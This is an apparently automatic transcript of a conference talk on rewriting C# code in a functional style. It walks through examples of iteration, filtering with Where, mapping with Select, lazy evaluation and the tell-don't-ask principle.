All right. Well, good morning. Welcome to the session on transforming your C sharp code to functional style. My name is Venkat Subramanyam. We're going to talk about some of the principles behind functional style of programming and how we could write more functional style of code. I know this is a fairly tall room here, but if you do have a question, I hope you do. I really like an interactive session. Please do raise your voice. Maybe you can say, hey, question, and then you can ask a question. I will have trouble seeing you, but I'll try my best to put my hands like this when I have to see. Now I can see you when I do that. So do ask questions, make comments, anything you have. Definitely, I would really appreciate you asking questions or making comments along the way. I really enjoy hearing from you and not just let me talk for an hour. So let's get started. What I'm going to do here today is I want to talk a little bit about functional style of programming, and then I want to look at some code examples. And one of the reasons for me to give this talk is I work with a number of companies, mostly on consulting projects. I do a lot of code reviews, help with design, help with architecture, help with test driven development, things like that. And when I do this, what I notice is programmers who have used C plus was for a number of years tend to use it the way they are used to. And even though C sharp has some really functional style of programming facilities in it, they haven't quite switched over to using it. And even when I work with them in creating design, I myself fall into the trap, and then it takes a bit of time to realize we could actually do this a lot better. So I'm going to go through some examples to look at how we can make the transition. But first of all, I want to start with the question, what's functional style of programming? Why do we really care about it? Functional style of programming is very declarative in nature, rather than working with the code at a very low level, where we tend to say every single step of what we want to do and how to do it, we instead can focus on simply telling really what to do and let the code figure out the details of how to do it. So it becomes a lot more easier. In fact, if you want to think about it this way, it is raising the level of abstraction so we can communicate better with the computer that's going to execute this code. It contains those things called higher order functions. And I'll talk about these again when we get to the code examples. So what's a higher order function? Now, we are used to doing a couple of things in C sharp. We are used to pass objects to functions. We are used to creating objects within functions. And we are also used to returning objects from functions as well. We can do exactly those with functions now and not just with objects. We can pass functions to functions. We can create functions within functions. And we can return function from functions as well. And those kind of functions that can accept and return functions are called higher order functions. We want to honor immutability. Now, mutability is one of those things that cause enormous amount of pain. Now, where does pain really come from? Well, what about mutability? Well, mutability is something we have done for a very long time. I mean, how bad could that be? So we kind of ignored it for a minute. But what about sharing? Well, sharing is a good thing, right? Because remember what mom told us, sharing is good. So sharing is good. Mutability is all right. But shared mutability is devil's work. And the minute you bring shared mutability together, all kinds of things go wrong in the applications. And to develop application with fewer errors and easier to understand, we want to really focus on immutability. And that leads to what are called pure functions. Pure functions are functions with no side effect. Now, here's one of the disadvantages, I think, in languages like C sharp, which have been created the old way or the object oriented way to be precise. And then, of course, we are mixing the functional style to it. And that causes some problems. So it is on us, the programmers, to make sure we don't write functions, the anonymous functions, the lambda expressions. And then in those functions end up actually modifying outside variables, even though the language, unfortunately, lets us do it. So it's not the question of what can we do in the language? It's more of a question of what should we be doing in the language? So we should focus on pure functions. Pure functions are functions that do not modify any external state and are not affected by any external state while it's running. And it doesn't modify any state as well while it is running. But why should we do any of these things? And the reasons are it can make the code concise. Who here wants to write a lot of code? Nobody, right? When you're young and naive, you want to write a lot of code. As you become an experienced programmer, you work to avoid writing code, right? Because the code you didn't write has the fewest bugs hands down. So it's a code that's concise. But don't confuse conciseness with terseness. They are not the same. A terse code is short and stupid and ready to hurt you. A concise code is transparent. You can see through it. It's short and easy to understand. So you want to definitely write concise code. A code that is expressive, it begins to read like the problem statement so we can know what it's doing right off the bat. And of course, less code is definitely good. It is a code that's easier to understand once we get comfortable with the syntax. It is easier to modify. After all, one of the things we really care about is maintainability of code. And a code that is easier to modify and maintainable is definitely something more welcome. It contains fewer bugs. Why would it have fewer bugs? It contains fewer bugs because there are fewer moving parts in the code. And as a result, it's got fewer bugs. It's also because it's more transparent. It ends up having fewer bugs as well. And it's very effortless to paralyze the code and make it efficient as well. We'll take a look at some of these features along the way. But if you ask me what's the biggest change, well, sure, the languages have changed. Today, there's no real mainstream language, I would say, ignoring C that doesn't have functional silo programming. But the biggest change in this silo programming is in the programmer's mind. We have to retune ourselves in the way we write it. So let's look at some examples of this. Let's start with iteration for a minute. Let's say I'm interested in taking a list of values, we'll say numbers, and I want to say new list, and I've got some integers on my hand. Let's just throw in together these specific values to work with. Now, I'm sure everybody here who has written code in C sharp had to iterate through some collection at some point. Almost every day we do this, right? So how would we go about doing this? We'll say far int i equal to zero, i less than numbers dot, what is it? Is it length, size, count? Is it count? It's count. Okay, I'll trust you, count. And then what do we do? i plus plus, and then I want to output over here, and what would I output? I would output, oh, numbers, how do I get the value through i, isn't it? Okay, yeah, that worked, isn't it? What an achievement. Well, what does this do? If you are into patterns, how many of you like design patterns? Quite a few, of course. This has a design pattern name. It is called self-inflicted wound pattern, right? So we do this all the time to ourselves. How many times I've written this code and you stop and think, is this right? Now, how many times have you written this code and two weeks later, somebody tells you that code doesn't work and you say, well, that's an off by one error. Anybody who said off by one error? And how do you feel when you do, right? Life kind of sucks when that happens, right? So that's an example of, you know, a lot of times people look at this code and say, that's a simple for loop. Well, unfortunately, they haven't understood the word simple. Well, the word they're looking for is familiar. It's a familiar for loop, but I'm going to say this is one of the most complex code you can actually work with. And the reason it's complex is, a, it's got way too many moving parts in it. For doing something very simple, you had to make all that line up. And once you do that, you got to make sure the boundary conditions are right set properly. You have to do that as well. And when it comes time to make change, you got to sit back and look at it one more time. We can do a lot better than that already in C sharp without moving away. We could instead of doing this, we could simply say something along these lines, right? So we could say, instead of this, we could say, hey, how about simply doing a traditional for each that's been provided for us. So we could say for each, and then we could say element, well, we could even say var e in numbers. And we could then say, for example, output the given element. Now, notice that this produces the same result. But this is much better than the previous one, because it's got fewer moving parts. But even more important, there are a few other semantical differences we have to be very mindful of. This is something to keep in mind. For example, if I were to say i equals 44 here, just all of a sudden, for whatever reason, I decide to modify the variable, notice what happened to the loop. It just bailed out. And that's a very big smell, because i is actually a mutable variable that you are affecting the state of, you got to be very careful. That is a fairly big design flaw in the looping itself, because i shouldn't be mutable if it really was iterative index. On the other hand, if you come here and say e equals 22 or whatever, you get a compilation error saying you cannot assign to the value of e, because e is a brand new variable through the loop iteration, and that is a much better way to do it. But collectively, these two are called external iterators. So what is an external iterator? An external iterator is like having a rude dog. You say move and it doesn't budge, and you have to kind of push it a little bit every step of the way, and the point really is you have to control the entire iteration all by yourself. On the other hand, we could use what are called internal iterators. So one of the first things we would do, switching over to functional style of programming is as much as possible, abandon external iterators and favor internal iterators as much as we can work with it. So in other words, what we're going to do here is to perform this looping, we could go back here and say, I've got these numbers, but I'm going to say numbers.forEach, and for each of the numbers given to me, I'm going to go ahead and output that particular value that's being given over here. So notice this code produces exactly the same result, but this is more concise, it's more expressive as well, but it's declarative in nature. How is it declarative? In this code, for example, notice what we did. We told the far loop to take on these range of numbers and loop through it. In this case, we told the far loop to take on the numbers and loop through each one of them, extracting one at a time, our focus has been on the looping aspect. On the other hand, in this case, we simply said, I want iteration, I don't care about how you do iteration, and here is what I want to do for each of the elements in the iteration. In other words, what we did is called seeding control. We gave up control on certain part. Giving up control on certain part is a good thing because we can focus on what's important to us and let the underlying library take care of what we don't care about. But the benefit of seeding control is this loop could be sequential as it is right now, or potentially this loop could be parallel as well if it makes sense. And how do we get that option without changing a whole lot of code? We get because right there, this dot means something to us as programmers, and that word is called polymorphism. Notice that line numbers 15 and 19 are static binding. You don't get any polymorphism in that code. On the other hand, the dot online 25 says, I am polymorphic, go ahead and call me. I'll tell you what I do, but I won't tell you how I do it. At run time, I will figure out how to do it based on the context and the object I'm working with. So this can give you quite a bit of flexibility in coding that you simply cannot so easily achieve with the other piece of code that we saw. So we look at internal iterator in this case. Now, let's think about filtering values for a minute. Now, imagine what we are told is only to pick even numbers from this collection. So how would you pick even numbers from this collection? Well, we would say var even only equals will create a new list over here of integers. And then we would say far var element in numbers one more time. And then we would say if the given number is even, then go ahead and put even only dot add. And then we would add the element. And then of course, once we are done with it, we would come out and we would say something along the lines of even only, and then we could say for each, and we could output the value that's in here that we are interested in outputting. So this example is about, oh, wait a minute, line number 16 I messed up. So this is a for each, of course, there we go. So you can see how we were able to do this code to only grab even numbers. Now, what did we do in this case? We use the good old for loop one more time. So at the first thought, you may say, this for loop looks really powerful. I can use it for so many things. I call it the jack of all force, right? Though this is like you hit a knock on the door, you open the door, a guy stands with a hammer and says, I'm here to fix your kitchen. And you'll be a little suspicious. You would say all that you have is a hammer is that really nice thing to do. And you don't want to use one tool for everything. And so using a for for everything is a sign of smell. But instead, we want to use different tools. A guy more professional walks in with a little bag, he's got a chisel, a little screwdriver in it, maybe other things that he wants as a tool. And you're asking me if he's going to use all these tools. He says, no, of course not. I'm going to use the tool that's right for the job I'm going to do. But I'll be very selective in what I use. So that is one of the biggest differences here. But look at this code for a minute. What did we do? We patiently first created an empty collection. Then we loop through one element at a time. Then we examine the element. Then we added the element to the other collection. We had to do every single step of the work we had to do. Anybody who has written code like this before? Everybody in this room, right? How do you feel when you write this code? Dirty, right? That's how you should feel. In fact, when you go home, if the kids come running to you, you say, don't touch me. I got a shower first, right? That's how you feel that I've been doing a dirty job all day. It's even worse for people who work from home. If a kid runs in while you're writing this code, you got to immediately close the laptop. Otherwise, the kid looks at this and says, that's what you do for a living, and they don't want to take after a profession, right? So this is a very low-level, really primitive code. In fact, that's what it's called. This is called primitive. So this is called primitive obsession. So we go through a lot of primitive obsession. So when you write C sharp code, stop for a minute and ask yourself, is that a primitive obsession that I've been held on to? Maybe it's time for me to free myself of that primitive obsession. So let's see how we can rewrite this code now. So what I'm going to do here is I'm going to take this away from here for a minute. Let's actually comment it out for a minute so we can look at it. So now what I would like to do here is try this out in a more of a declarative style. So what am I going to do? I'm going to say numbers. And in this case, we're going to use a where method in C sharp, given an element where the element is even. So that completely extracts even numbers for us. And the next thing I'm going to do here is convert it to a list over here. And then I'm going to say for each of these elements, go ahead and print out. Actually, let's short circuit this just a little bit for ourselves. And I'm going to simply say print that element for me. And we can ask it to print those values out. So you can see how in this case, we accomplish the same task, but with a lot fewer lines of code, but more important, more than lines of code, I really appreciate the expressiveness of the code. If, for example, if I show you this code and ask you, what does this code do, you tell me, wait, wait, let me try to figure it out. Right? Now, on the other hand, when you look at this code, you say, let me read it. Given a collection of elements, only pick up what are even and then print them out. So the code ends up beginning to read the problem statement. And so it becomes easier to work with. So that is an example of how we went from an imperative style to a functional style using the where method. And that really helps us to filter out elements. So once again, as you are writing and working with collections, we do this also all the time. We end up writing code where we got to take a collection of objects, and we have to do something with only a small set of objects. And we can write in a functional style rather than going through the original for loop. Our minds are wired with the for loop only because we are familiar with it, not because that is a better way of programming, and it is a retuning of our mind to start using this a little bit more. So we looked at the filtering operation, but it is a good time for us to compare nodes about this imperative and declarative style. In the imperative style of programming where we saw in the top, to the more of a declarative style of programming in the bottom, every declarative style is not necessarily functional, but functional style is declarative. So think about this as that is declarative style of programming, and this is functional style of programming. You can be declarative and non-functional, but functional style is declarative in nature. So that is one of the biggest benefits of writing functional style of code. So what are the differences? In the case of imperative style of coding, we got to specify every single step of what to do and how to do it. In a functional style of code, we are more directive, we focus on only the what and not on the how to do it. So in other words, rather than getting into the muddy details of every single step, we just told, given a collection, pick even, print it out. So the point is, we are able to focus on a higher level of detail abstraction rather than the muddy detail low-level programming. In a way, the top one looks like talking to a toddler. Imagine you have a toddler, and the toddler wants to get you something. What do you do? You say, sweetie, stand very carefully, walk every step, look where you're walking, don't look elsewhere, hold your both arms. You got to say every single step of detail. The bottom code, which is declarative, feels like you are talking to an adult. Well, okay, on a second thought, it feels like you're talking to a responsible adult, right? So that is the whole idea, is that you are able to be directive and say, just do that for me, and you don't care about how it's actually being done. You have mutability versus immutability. Did you notice on line number 15, you created a variable. On line number 18, you continuously mutated it with values over and over and over. I did not turn up the volume of my computer, but if I had the volume up, you would actually hear this variable say, ouch, ouch, ouch, on this line of code, because you're continuously mutating that variable. So you typically do mutation in imperative style, but notice there is no explicit mutation in this code at all. We're not manipulating any variable. We are simply writing a pure function. The pure function is right there, which says, just tell me if this element is even or not. That's purity. It doesn't modify anything. It simply gives you a result of a true or false. That's all it does. Sure enough, this is a bit of an impurity, and that's one of the reasons why you could argue C sharp quite directly didn't provide it on the collection. It had to give it on the list itself. So that's a bit of an impurity, but this one definitely is purity, where we only perform an operation and give you a result rather than mutating stuff, and it's expressive. We are deliberately specifying what we want to do and not focused on how to do it, and we see cd control to the lower API to do that. So we don't have any side effects, and as a result, it can enjoy purity. Now, how does that work? Imagine you have this kind of code in your application, and you have a lot of these kind of code, four statement everywhere, and you have all these loops with mutation everywhere, and a few months goes by, and your company says, you know what, this application works really nicely. Good job, guys. But our performance is really poor. We need to improve performance, and you're scratching your head. How do I improve performance for a large set of data? And there seems to be no real good answer at this point. You're kind of wondering about it, and suddenly one of your colleagues says, I've got a great idea, and immediately you say, what do you have? And your colleague says, you know how we have multi core processors? We could actually use multi-threading, and immediately some really scary thoughts go to your mind. You remember the last project you worked on in this other company where you had sequential code, a lot of code, and they told you that you have to use multi-threading, and so you did. And when you did, did the code look the same as it was before? Not at all. In fact, the code that was elegant and simple kind of ended up becoming a monster, isn't it? And then what did you do every day going to work? You dreaded, because you had to go fix all those bugs in the code, reminds you of that, isn't it? And then while you were fixing the bug, what did you do? Apply for this other job. That is called concurrency, right? So no, we don't want to do that. Well, look at this code for a minute. What, how does this code look like? Well, there is no mutability or external mutability on our hand. In fact, if you were to take this collection, you could simply throw in something as simple as parallel, and then you could have this execute concurrently. Of course, the trivial example you're looking at here, but imagine each of this in the sequence where a serious amount of work to be done. What would happen then? You're not modifying a lot of code. The structure of the code between concurrent and sequential code is exactly the same. So you're able to enjoy multi-threading without having to compromise on a lot of code quality and expressiveness and conciseness and understandability, maintainability, all those good stuff. This leads to a better programming style, really. And as a result, there are some really good benefits that this provides for us for avoiding side effect and writing pure functions. So instead of accepting data alone, we can accept functions as well. Take a look at each of these functions here for a minute. Notice what happened here. The where is a higher order function because it is accepting another function as a parameter. Similarly, is the for each function. So we can pass functions to functions. In the case of the imperative style, it is very hard to compose your functions. Whereas it's very easy to compose. I want you to think of these two words for a minute because these make a very fundamental difference. Think of the word statement for a minute. How do you feel when you think of the word statement? It kind of sucks the life out of you, right? Because it tells you something certainly. And what happens when you use a statement? Imagine for a minute, you use a if statement, which is one of the things I really hate. If you use a if statement, what happens? If something, and then it does some work over here, and then you say else, and it does something else over here, and then you go to the if and say, how did it go? And if said, yep, I'm done. Well, what's the result? And what does if say? I won't tell you, right? I put a result somewhere there in the memory, you go get it if you want to. So this is one of the things I really hate about statement. Statements definitely, right? Because they don't return anything, force mutation on us. They're very grim. They take the life out of us. A good language really has no statements at all in it. What they have instead are called expressions. Now look at the word expression. You feel light already when you say it, isn't it? I can see smiles on people's face already when you say expression. That means you are going to smile more when you write code. Imagine a language where there are no statements, but there are only expressions. Well, this is something for us to think about when we design our own APIs. Don't make your APIs statements, instead make them expressions. It becomes a lot easier to work with because expressions return results back to you. They don't force mutation on you, and you can compose when from one expression to another, which is exactly what we are doing here if you notice. You did a for each statement, and once the for each is over, what do you do with the result? Well, you got to go get it from where it put it. On the other hand, notice where nicely gave you a result, and you were able to continue further with it as a nice flow or composition because expressions nicely flow through statements block you, and then you got to go get the result and then go. It's like jumping hurdles, right? Whereas expression nicely flows through for you. And of course, we mutate data normally in a imperative style of code, as you saw in the example, but whereas in this case, if you notice, we nicely transform the data from a collection of all the values to a smaller collection of only even numbers to finally printing them out. So we nicely flow through and transform across these things. Let's enter in this thought just a little bit more. We always do this again in programming. We take a collection of objects, and we want to do something with the collection. For example, we may get a collection of stock symbols. We may want to come up with a list of stock prices. So doubling is just like one of those examples that are everywhere you turn around. There are examples like this you do all the time. You may have stock prices, you may want to get their prices, you may have people's ID, you may want to get their addresses, or insurance coverage. These people have whatever it is. It's a transformation operation we perform. Doubling is just one trivial example of transformation. We do this all the time in the code. How do you do this imperatively? Let's take a look at an example of imperatively doubling each of the elements. We could say in here, for example, var doubled, we could say, for example, and again, you list of integer, again, an empty list, and then we would say for each, and then var element again in numbers. And this time, we would simply say double.add, and then we would say e times 2 to add the elements. And then, of course, once we get to this, we could say doubled.forEach again, and then we could simply output these values that we have on our hand. So we could simply say console.rightLine to output it. Again, this is a very imperative style of writing the code. We can do a lot better than this. So this often in functional programming is called as a transformation or also called as a map operation. So mapping operation is one of my favorites. You take a collection of input, and then you get a collection of output exactly the same number of output as a number of input, but you apply the transformation function right in between. And that transformation function you specify is automatically applied for each and every element in the collection. So in this case, I'm going to say that I have numbers on my hand, and I want to use a select in this case. That's what C sharp calls it as. And my operation is doubling the elements. And then, of course, when I'm done with it, I can simply say I want to print these values. So we could say for each, and we could simply print out the values in this collection, for example, and we will simply put the name of the function itself to use. So you can see once again, we didn't use a where clause here, but we used a select clause to do this operation. And we can see how powerful this operation is. Again, rather than thinking low level looping, let's think about what operation we want to perform in the collection. We want to take each of the elements in this collection and transform it. And select is not a word that I really connect to as much. Unfortunately, I really like the word map or collect, but this is really a mapping operation. And then you are performing this operation on these elements and then getting the value out of it. So we saw the functional style. This really takes us to some very powerful function composition styles that we can use. Let's take a look at one problem to understand this particular point. Now, let's go back over here and take a look at this example. Let's say we have these numbers 123454, let's say 6789 and 10, let's say. And I want to be able to find this operation. Let's take a problem to solve and see how we're going to solve it. Find the double of the first even number greater than three. So that's what I want to do, right? A simple problem. Find the double of the first even number greater than three. I'm going to write this with the for loop. So int result equals zero to begin with. When I'm done, I want to print the result that we have on our hand, which is to be computed in this example. So for each, I'll even use a for loop, not a for each statement. So var e, and I'm going to say in numbers. And what do I do at this point? Now that I have these numbers, I'm going to say if e is greater than three and e is an even number, then I want to say that result equals e times two. So there you go. What do you think? Is that good? Is it done? You want to break? There's only 20 more minutes. Oh, you want to break statement? Okay. So break. Now is that good now? Notice you went from it is wrong to, I'm not sure. Well, this code is wrong. But I won't tell you how it's wrong. I'm going to run it and it works. But here's the deal, right? Two months goes by. The guy walks in, you know who that guy is called the tester. And he says, your code sucks. And you say, I know it. But tell me how it sucks. That's the part I don't know, right? Well, we don't know how this code sucks. That information is kind of hidden. But rather than finding how this code sucks, let's actually write the code to see how it in a different way and see if it comes up for us. So let's get rid of this imperative style for a few minutes. We'll come back to it. Let's do this in a declarative style, shall we? So here we are numbers dot. In fact, I'm going to output the result directly. So numbers dot. And I want to get only numbers that are greater than three. What operation should I use for that? Aware. That's correct. Thank you. Aware. Given an element, element greater than three. And I want all the even numbers. What should I use for it? Aware again. So where, given an element, element mod 2 is equal to zero. And I want to only get the numbers that are going to be doubles, right? I want to double all the values. What would I use for that? Select. That's good. Thank you. And I'm going to say e times two. But I don't want all of them. What do I want? The first one, right? So I say first and that's all I care about. I'm asking for it. Well, okay. What is the problem, though? If you look at this code, both of the code produced the result. Now imagine this was a problem given to you. And you were business analysts said, given these list of stock prices, you know, do this, do this, do this, do this. And you have a code sitting in front of you. A few weeks goes by. You're sitting with somebody who knows the business and they're asking you, what does this code do? What do you say? I'm trying to figure it out still. Hang on. Right? Because notice the loop. You're going loop, loop, loop. Oh, break in the middle. There's more happening before, more happening, you know, outside. What's going on here? You know, we thought with structured programming, we got rid of spaghetti code. We really didn't. That is again a spaghetti code. If you really think about it, we go back and forth in it. Whereas here we are saying, given a collection of values, I'm going to take each of the values and the collection, take only what are greater than three, only that are even that's left, double the values, get the first one. So notice how it begins to read like the problem statement. You don't have to debug the code. You can read it and understand it. So it is very transparent. In other words, but there is a problem in the code on the top. What is the problem? That is hiding. So I want you to think about this for a minute. A good code is like a story, not like a puzzle. I want the code to be like a story. You don't want to read a code and say, wait, wait, wait, let me figure out. And then once you figure out three hours later, a little celebration, I got it, right? You don't want code to be like that. You want the code to be obvious. It should be boring when you read the code so you can go do other fun stuff, right? You don't want to sit there and say, I finally figured out what this code is doing. That is not good use of our time. So I want a good code to be like a story, not like a puzzle, which you have to really figure out what's going on. That's not a good use of our time. So notice what happened in this case. If I go back to the previous code for a second and remember the tester who walked in and said the code sucks, what did the tester really do? The tester ran the code as testers normally do. The tester ran the code on an empty collection. And when the tester ran the code on an empty collection, what would the code do really? Any guess? It returns a zero. That's correct. But how do we know that is the right answer? Is zero the right answer? Or is the right answer, dude, I don't know. You gave me an empty list, right? So in other words, it really didn't reveal the intent quite well at all. On the other hand, if you had written the code in the declarative style, let's try to figure out what's going to happen. Well, the chances are you're going to be programming defensively. And if not, it is much better. I would rather have a code blow up on my face with a huge noise than quietly misbehave, right? Because when a code quietly misbehaves, it's more expensive to find and fix it. When a code blows up on your face, it's easy to figure these out during testing. So for example, in this case, just for our purpose, I'm going to put a try because it's going to blow up and we can see it actually. Otherwise, it's going to pop up a window and I'm not found out that window that pops up here. So I'm going to say catch exception. And I'm going to say in this case, EX, and then I'm going to simply output the exception right for us. So when I run this little piece of code, notice what it says. It says invalid operation exception. The sequence contains no elements. And that was a very clear message that gave us where did that come from? Well, that came from calling the first method. So the first says, yes, I did go looking for the first one, but don't it, you gave me an empty collection for me. I don't have anything to give you. So if the collection was empty, the collection had no even numbers, so the collection had nothing greater than three. And options like this, it can handle fairly well, as we can see in this example. So it doesn't lurk around with problems. It is very revealing, as you would see in this particular case. So that is an example of how we could write this in a much better way in a more of a declarative style rather than writing this in more of a imperative style of code. And so that I prefer a lot over then having to write the code in the imperative style and then dealing with a greater amount of mess on our hand seems reasonable so far. Well, usually at this point, somebody jumps up with a question. What's the question that's on your mind? This looks all right. But look at that. You're doing two ways. One select. Go ahead, please. Right. Well, in this case, it says you have to order the numbers, but it doesn't matter what the ordering is. They want the first from the given order. That's the given in the problem. If not, of course, you would have to sort and do something like that, please. Right. So performance seems to be really a problem, isn't it? So you look at this and say, you know what? I'm almost convinced, but not entirely yet. But the problem here is this is easy to read. I'll give you that. But in the other code I wrote, I clearly have to read hard to understand, but we don't have to worry about it. We only write code. We never read it. So in that code, we did one loop. In here, it appears like we are looping through once to get the values, second time to get the even, third time to double it out of your mind to be able to do that that many times. Let's entertain this thought for just a minute, if you will. I want to go back to the imperative code just for a second, and I'll come back to this. If you look at the imperative code for a second, what is the number of operations we perform? I'm going to ask the gentleman here in the front to keep account for me. You're my counter for me here. So what are we doing? We're going to check for every element. There are 10 elements in this collection, if you notice. Well, where did the elements go? So there are 10 elements in this collection I want to work with. And so these values, 1, 2, 3, 5, 4, 6, 7, 8, and 9. So there are 10 values over here, up to 10 values. So what are we going to do? For 10 values, I'm going to start the looping. I'm going to do this operation greater than 3 and is even. What are we going to do it for? I'm going to do it for 1, 2, 3, 5, and 4. So that is 5 times 2 is, well, actually, I'm going to just perform this one operation here. But I'm going to perform greater than 3. I'm going to perform greater than 3 on what? I'm going to do it on 1, 2, and 3. But this will short circuit because it will never get to the other part. So that is 3, keep in mind. For 5, it'll pass through, it'll fail this. So that's two more operations. For 4, it'll pass through both of them. So that is two more. That's 7. It'll perform multiplication. That is 8. So 8 is your number, sir. All right. Excellent. Thanks for your help. Now let's get to the code over here. Now to our human eye, this appears like a lot of waste. And the reason it appears like a lot of waste is we are going from one collection to another collection to another collection. It appears like that's a 20 plus operation. Gosh, what a waste. Let's think through this a little bit in a minute. So it is still running. Let's do a little refactoring before we go. I'm going to change this over here to is greater, greater than 3. And I'm going to change this to, if you will, is even. And I'm going to change this one to double it. And now I'm going to write those methods. So static Boolean is greater than 3 number. And I'm going to simply say return number greater than 3. I'm going to redo this, if you will, for those other two guys. So this is going to be is even. And I'm going to redo this for double it. So in this case, I'm going to simply say percent 2 equals 0. And then finally, I'm going to simply say return times 2 for this value. The result in this case, oh, wait a minute. It should be integer that I'm returning. There we go. So the result is still the same 8 as you can see. That's great. But I forgot to mention one thing here. The collections that you see here have a trade common with my children. They are absolutely lazy to the bone. And I go to my children, hey, you guys, have you done with your homework? Oh, yes. How did it go? Fantastic. Is everything working? Absolutely. Can I see it please? Sure. And they run to their rooms. I don't see them for an hour. Like what are they doing really, right? So that's exactly what these guys do also. You go to this and say a collection. Yeah, go do the where clause done. Do the where again done. Do the select done. Do the find. Oh, dear. Right. It says that's when we have to go do the work, right? They're very smart. So let's go ahead and try this. So I'm going to go back to this one and say I'm going to output at this point is greater than called the far and let's say zero in this case number. So similarly, I'm going to output over here. The same thing. I'm going to say is even called for and then I'm going to say a double it called for. So let's go ahead and run the code and see what's a performance like. Oh, notice now is greater than what's called for one, two, three, five. And then it called is even for five. It called for is greater than for four is even for four double it for four. I see eight operations. What do you have eight as well? So we didn't do any extra work whatsoever in this case, because it is that cool. It is very lazy. Oh, I'm sorry. I forgot to mention you don't say the word like that. The word lazy is pronounced efficient, right? So you can see how efficient this is. So what did it really do? It was smart enough to merge these operations together and say, I'm going to do this for one element. If it is not successful, move to the next one. If it is successful, don't go to the next element. Instead, go to the next one and see if that's good, go to the next go down further. Otherwise, go to the top to the next element. So it is smart enough until it gets to the end. Of course, this depends on the nature of the operation you perform, the sequence of the operation to perform, the terminal call you call, all that makes a difference. Just to illustrate this point once more, I wanted to see this just one more time very clearly. Notice this produced that result, but that all was done when the boss comes around. And the boss in this case is the first operation. So what is this like? I'll relate this to an example in my own life. I have to file taxes because I live in a country where there is double taxation in the United States. One, you have to pay your tax and you have to spend more time and money filing that stupid tax return. So tax return is something everybody hates filing more than paying taxes. So there is always one rule I follow. I always file my tax return on the 15th of April. Do you want to know why? It is because on the 15th of April, I wake up and say, I'm still alive. I have to file this. At 11 p.m., I have a conversation with God. God, there is an hour left. If I'm going to be living for tomorrow, I'll spend this hour filing tax. But you tell me now, right? That's called the last responsible moment. You wait until you don't have to do it. First is like that. Notice with the first, you can see that result. I removed the first and I run the code. Look at the quietness. None of those functions ever ran because these guys are saying, cool, we don't have to do it. Right? So that is the whole point of laziness. You're not wasting your effort. You can even roll this into a library and return that collection and you can postpone evaluation at the caller end and you can decide whether to run this or not at your own will. So you can get fairly decent performance by doing this also. And we saw the function computation as a composition here, as you can see. So the point really is we are composing the operations and flowing through the transformation but not losing any performance as you can see or efficiency. So we can be very lazy and I encourage you to be very lazy when it comes to programming in functional style. That is now the other thing I want to talk about is the tell don't ask principle. Now I ran into this quite a few times and I'm surprised every time I run it because my mind I would say is wired deeply into imperative style of programming because that's what I spent years programming in. Functional programming is something I have to put a little bit of effort to really do and I would write a piece of code and I would say this code sucks but I can't tell why it sucks and suddenly it will pop out in my head saying oh gosh wait I'm not being declarative let me try this again. I'll give you one example of this of asking if you will. Imagine for a minute that we have an object called a room object and the room object I'm going to create right here a bunch of rooms if you will. So I'm going to say rooms equals new list of room and I'm going to make this example very easy for us to work with. So I'm going to say new room and I'm going to say booked rooms. So I'm going to create let's say about five rooms here and the last two rooms are not booked at this point. So I got a bunch of rooms on my hand. Now let's take a look at what a room looks like. So I'm going to go to the room and if you look at the room class very trivial just to illustrate the point the room has two things. It's got a ease booked I just made this up so that I can see that it goes through some some objects before it succeeds. Ease available takes a date time object and it says if the the logic for implementing of course not done it says checking and then it simply tells you whether the room has been booked or not. Then I have a book function and the book function again takes a date time and what does it do goes through the logic not implemented here and eventually sets book to true if it was successful to book if it was not throw exception do all that fanfare right. So that is our room class. Now I want to go ahead and book a room for a date. So what would I do? So this is my natural first thought I would say for each room in rooms right. So we'll start with the room and what would I do if room dot and I would say the first call is ease available as you can see right here. So I'm going to say if it is available for a date. So what is the date I'm going to say date time date equals let's say date time dot now and I'm going to see if it is available if it is available. I'm going to say room dot book and for the same date but there's one problem if I was able to book it I want to say book to room equals the room that I have on my hand and I have to break from it as well. So you can see the smell slowly coming out of this right. So you're going to sit a little further away and code because it becomes smelly as you're coding this. So in this case of course I'm going to say room book to room equals and if you just do this the compiler gets very angry at you to say that you're not going to be setting this properly right in reality you would have to do a little bit more work here. So what would you do to make sure what if the room was never booked. Well here comes the problem let's say we do this for a minute if I come here and say book to room and I'm going to say zero and I'm going to say the book to room is the book to room the compiler gets angry at you to say what are you talking about you haven't given me a value. So what do you do now you're going to say no that just takes the life out of you right. Anybody here who likes null no right that's a four letter word in programming right. So you don't want that. So when you run this of course that gave you that result but a very smelly code. This is an example of a code that enjoys the asking and in fact I was working in an application where I was doing something like this and I was a little puzzled. I looked at this code and I said you know what I was doing test driven development I was writing test I was writing code we had this code in front of us all the tests passing and I'm telling hey there's something wrong in this code I'm not happy with it and I'm not able to put my finger on what bothers me. Then I spent a few minutes scratching my head and suddenly I realized wait it's a tell-down-ask principle we're asking the room are you available then turning around and booking it please. Please. All right so the question is what if this another thread is in place you're really evil aren't you. Well absolutely that becomes even more of a problem as well really an excellent point. So there's other problems in this code but not even considering multi-threading it's already foobored but we would really have to worry about that as well absolutely. Okay so there is a few problems we have to think about with multi-threading coming in as well absolutely you are correct. Let's see how we're going to use this telling rather than asking for a minute. So let's do this one more time this is when we have to redesign our API so when you're designing your API we got to move away a little bit from this command query pattern because we say are you available if so I want to book you that is not very what do you call it atomic let's try this one more time I'm going to go back to this code maybe we can make these guys private for a minute so I made that private I made that private and I'm going to change it to public over here Boolean and I could say book if available and in this case I'm going to say date time date over here and I could say if is available for the date then otherwise return false and if it's available I could say book the room because it's available and then of course return true and to go back to your question I would make this code thread safe right I had this in mind when I was writing this code I said darn it and when I looked at the book if available I said to myself hey this is easier to make a thread safe that becomes a concern so I'm really glad you pointed out it's even better than you know injecting that later so absolutely thanks for sharing that thought so we can make this more easily synchronize our thread safe and of course in this case we ask this question now notice what happens to this code let's get back to this code one more time and see what's going to happen to this I'm going to keep the last part the same for a minute if you will if you will and I'm going to say now a room book the room equals and I'm going to say room start well I want to pick one room out of the whole thing what would I use for it let's say I want to pick all of the rooms which match a criteria match criteria what would I use where that's exactly what we're going to use where room and I'm going to say room dot book if available right that's the method name I called it book if available so we'll say book if available and this is going to be date but I don't want all the rooms of course poor guy what would I do with all of that so I'm going to say dot first and get me just the first one so in this case we asked us to get the first room that is available and notice the result is the same but on the other hand though we wrote it in a much simpler and expressive way and this is more clearer in terms of what it's doing right when you find the rooms with this criteria book me the first one that's available so you're able to write that but notice from the output because it is lazy it bailed out the very first time it found a room and didn't keep booking all the other rooms so the output is exactly the same in both cases it looked for four in the previous it looked for four here also because the fourth one is the one that's available the first three were not available at all so the output is the same in both of those we didn't do any extra work however we did a lot less typing with our fingers and less code 